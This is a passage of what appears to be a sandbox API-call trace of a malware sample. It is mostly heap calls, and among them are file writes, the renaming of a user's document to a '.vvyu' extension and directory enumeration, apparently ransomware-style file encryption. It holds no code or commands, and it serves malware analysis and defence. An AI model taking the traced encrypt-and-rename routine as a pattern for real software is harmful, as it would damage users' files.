(HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ef8 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38f40 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0188.433] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0188.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0188.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0188.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0188.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398c8 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d398b0 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0188.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0188.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0188.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0188.436] GetCurrentThreadId () returned 0x264 [0188.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0188.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d384e8 [0188.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0188.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0188.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0188.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.437] GetCurrentThreadId () returned 0x264 [0188.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0188.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0188.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c829b0 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0188.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0188.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0188.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398c8 [0188.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0188.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39928 [0188.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0188.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0188.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.439] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0188.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39940 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398e0 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398b0 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0188.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0188.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0188.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0188.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0188.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0188.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0188.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0188.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0188.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0188.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39880 | out: hHeap=0x6a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38f40 | out: hHeap=0x6a0000) returned 1 [0188.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0188.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0188.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0188.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0188.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0188.448] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xba05, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xba05, lpOverlapped=0x0) returned 1 [0188.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0188.449] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xba0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.449] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0188.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0188.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0188.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0188.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0188.450] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0188.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0188.451] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.451] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0188.451] CloseHandle (hObject=0x584) returned 1 [0188.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0188.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0188.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0188.455] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\EXsKx.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\exskx.odp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\EXsKx.odp.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\exskx.odp.vvyu")) returned 1 [0188.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0188.457] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x723d10 | out: hHeap=0x6a0000) returned 1 [0188.460] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29e970b0, ftCreationTime.dwHighDateTime=0x1d897e1, ftLastAccessTime.dwLowDateTime=0x63901a60, ftLastAccessTime.dwHighDateTime=0x1d89a27, ftLastWriteTime.dwLowDateTime=0x63901a60, ftLastWriteTime.dwHighDateTime=0x1d89a27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PeBfuwtoR 4", cAlternateFileName="PEBFUW~1")) returned 1 [0188.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0188.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0188.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x54) returned 0x2bf9bd8 [0188.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0188.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0188.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0188.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cbfa50 | out: hHeap=0x6a0000) returned 1 [0188.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0188.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0188.462] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4184a0, ftCreationTime.dwHighDateTime=0x1d89b04, ftLastAccessTime.dwLowDateTime=0x7328e620, ftLastAccessTime.dwHighDateTime=0x1d89d59, ftLastWriteTime.dwLowDateTime=0x7328e620, ftLastWriteTime.dwHighDateTime=0x1d89d59, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qGqm", cAlternateFileName="")) returned 1 [0188.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0188.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0188.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0188.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0188.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0188.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fe60 | out: hHeap=0x6a0000) returned 1 [0188.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0188.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0188.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0188.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0188.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0188.465] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2181920, ftCreationTime.dwHighDateTime=0x1d8a59a, ftLastAccessTime.dwLowDateTime=0x189d1bd0, ftLastAccessTime.dwHighDateTime=0x1d8a5b6, ftLastWriteTime.dwLowDateTime=0x189d1bd0, ftLastWriteTime.dwHighDateTime=0x1d8a5b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rQz y4W0rYbhQ_iRzD3", cAlternateFileName="RQZY4W~1")) returned 1 [0188.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0188.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2eca8 [0188.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0188.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2d2ed20 [0188.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0188.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0188.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0188.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0188.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0188.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0188.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0188.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0188.467] 